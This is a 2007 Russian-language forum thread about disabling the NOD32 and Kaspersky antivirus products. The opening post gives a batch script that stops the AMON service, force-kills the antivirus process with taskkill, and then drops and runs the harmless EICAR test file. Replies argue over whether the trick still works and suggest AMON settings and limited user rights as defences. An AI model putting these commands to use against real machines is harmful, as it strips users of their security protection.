Твой софтовый форум > Тематические форумы > Хак! Ломать не строить - это уметь надо

Как сломали NOD32, BitDefendre и BullGuard

,

Видео о том как вынесли вышеперечисленне

Дата публикации: 19.12.2007 - 13:17
Pages: 1, 2
KJIACTEP
Нарыл ссылочку в инете, на видюху о том как вынесли с помощью простого батника НОД32, битдефендер, буллгуард со включённой самозащитой. Попробывали вынести этим же макаром каспер, неполучилось. Когда у него включена самозащита то ему как по видео так и в моих пробах всё пофиг. Представляю ссылки:

Kasper 7.0 vs NOD32-
http://rapidshare.com...070/1.rar.html (4 Мб)

BullGuard vs Kasper-
http://rapidshare.com...s_KIS.rar.html

А теперь гвоздь вбитый в программу НОД32-
http://rapidshare.com...s_KIS.rar.html
------

Кому интересно, тот сам может попробывать вынести НОД32. Точнее останавливаеться служаб амон кажетсья, а иногда даже выноситься сам НОД. А точнее всегда выноситься. Просто создаём текстовик, суём в него эту инфу:

start net stop amon
taskkill /IM nod32krn.exe /F /T
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*> eicar.com
eicar.com

потом "Сохранить как" -> "все файлы" имя задаём например NOD32VSKIS.bat обязательно нужно написать .bat

потмо при врубленном ноде врубаем батник и... трындец...

Пробуем то же самое тока код меняем на:

start net stop amon
taskkill /IM avp.exe /F /T
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*> eicar.com
eicar.com

Вообщем смотрим smile.gif
Zheny
QUOTE
Кому интересно, тот сам может попробывать вынести НОД32. Точнее останавливаеться служаб амон кажетсья, а иногда даже выноситься сам НОД. А точнее всегда выноситься. Просто создаём текстовик, суём в него эту инфу:

start net stop amon
taskkill /IM nod32krn.exe /F /T
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*> eicar.com
eicar.com

потом "Сохранить как" -> "все файлы" имя задаём например NOD32VSKIS.bat обязательно нужно написать .bat

потмо при врубленном ноде врубаем батник и... трындец...

Ну и как понимать то, что НОД сразу же отреагировал не хуже Каспера??? mad.gif Очередная реклама всемогущего Касперского??
З.Ы. Может прежде чем писать, стоит самому проверить достоверность информации?? shot.gif
KJIACTEP
Эм... ты видео смотрел? батник выбивает нода из процессов, и создаёт ехе шник эикара на рабочем столе и ноде его не ловит.
Zheny
В том то и дело, что смотрел. И даже повторил трюк, и ничего не выбило
При попытке запустить бат нод его словил
Pascaller
Не забывайте что антивирусники обновляются и НОД32 не исключение, а видео возможно уже старое, вот вы и спорите smile.gif
SLIDER
О чём спор непонятно! Народ сломать можно всё! Идеальной защиты нет и небудет.

NOD и Каспер хорошие антивирусы, но обходятся на ура, новые вирусы невидят пока им не пришлют на них сигнатуру. Ну и кто кого спрашивается???

Кому надо тот всегда найдёт дорожку к в вашим КалькуляторАм типа PC.....и вам никто и ничего не поможет....
Quim2005
Согласен со SLIDER. Любой антивирус можно ломануть и обойти, тем более если вы с правами администратора. Но с другой стороны, почему я с этим правами не могу удалить антивирус? По всем законам должен, просто надо нормально организовывать права пользователей и не давать им администраторских прав.
Borispetrovi4
Zheka4

а у меня Nod не отреагировал... а почему не знаю... может что подскажеш?
Zheny
Borispetrovi4 В настройках модуля AMON поставь галочку сканировать файлы при создании, и на вкладке методы выбери все методы сканирования. И конечно не забудь обновить базы и сам антивирь.
Calabus
Вся приколюха в том, что када жмёшь в винде три пидали, то можно удалить НОД32 из процессов без всяких трудностей, поэтому он так легко и ломается, а вот Каспера так не срубишь, при попытке вырубить процесс он матерится и грит что ФИГ ВАМ доступ запрещён. Вот так вот...
Pages: 1, 2


Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке: Как сломали NOD32, BitDefendre и BullGuard
SoftoRooM © 2004-2024